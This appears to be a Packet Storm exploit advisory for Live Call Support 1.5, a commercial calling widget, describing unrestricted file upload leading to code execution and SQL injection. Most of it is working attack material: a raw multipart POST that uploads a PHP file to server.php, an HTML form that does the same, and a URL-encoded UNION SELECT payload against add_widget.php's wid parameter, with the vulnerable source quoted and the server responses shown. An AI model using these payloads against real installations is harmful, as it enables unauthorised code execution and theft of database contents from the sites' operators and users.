exploit the possibilities

Live Call Support 1.5 Code Execution / SQL Injection

Live Call Support 1.5 Code Execution / SQL Injection
Posted Jan 15, 2019
Authored by Ihsan Sencan

Live Call Support version 1.5 suffers from code execution and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, sql injection
MD5 | b31903a1c6a7d1145659736655dd9fd6

Live Call Support 1.5 Code Execution / SQL Injection

Change Mirror Download
# Exploit Title: Live Call Support 1.5 - Remote Code Execution / SQL Injection
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ranksol.com/
# Software Link: https://codecanyon.net/item/live-call-support-widget-software-online-calling-web-application/22532799
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:
# 1)
# http://localhost/[PATH]/server.php
#

#/[PATH]/server.php
#912 case "save_settings":{
#913 if($_FILES['call_widget_image']['name']!=''){
#914 $ext = getExtension($_FILES['call_widget_image']['name']);
#915 $fileName = uniqid().'.'.$ext;
#916 $tmpName = $_FILES['call_widget_image']['tmp_name'];
#917 $res = move_uploaded_file($tmpName,'images/'.$fileName);
#918 if($res){
#919 $fileName = $fileName;
#920 @unlink('images/'.$_REQUEST['hidden_call_widget_image']);
#921 }else{
#922 $fileName = $_REQUEST['hidden_call_widget_image'];
#923 }
#924 }else{
#925 $fileName = $_REQUEST['hidden_call_widget_image'];
#926 }

POST /[PATH]/server.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 592
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------307672102411665: undefined
Content-Disposition: form-data; name="call_widget_image"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------307672102411665
Content-Disposition: form-data; name="hidden_call_widget_image"
5c3b2a6842c13.png
-----------------------------307672102411665
Content-Disposition: form-data; name="settings_id"
1
-----------------------------307672102411665
Content-Disposition: form-data; name="cmd"
save_settings
-----------------------------307672102411665--
HTTP/1.1 302 Found
Date: Sun, 13 Jan 2019 12:14:24 GMT
Server: Apache
X-Powered-By: PHP/7.1.25
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
location: settings.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC:
# 2)
# http://localhost/[PATH]/server.php
#

<html>
<body>

<form action="http://localhost/[PATH]/server.php" method="post" enctype="multipart/form-data">
<div class="form-group">
<label>Call Widget Image</label>
<input name="call_widget_image" type="file">
<input name="hidden_call_widget_image" value="5c3b2a6842c13.png" type="hidden">
</div>
<div class="form-group">
<input name="settings_id" value="1" type="hidden">
<input name="cmd" value="save_settings" type="hidden">
<input value="Save" class="btn btn-primary" type="submit">
<input value="Back" class="btn btn-default" onclick="history.go(-1)" type="button">
</div>
</form>

</body>
</html>

# POC:
# 3)
# http://localhost/[PATH]/add_widget.php?wid=[SQL]
#

#04 if($_REQUEST['wid']!=''){
#05 $widget = getWidget($_REQUEST['wid']);
#06 $pageTitle = 'Edit Widget';
#07 }else{
#08 $pageTitle = 'Create Widget';
#09 }

GET /[PATH]/add_widget.php?wid=%2d%34%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e()%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2019 12:34:12 GMT
Server: Apache
X-Powered-By: PHP/7.1.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close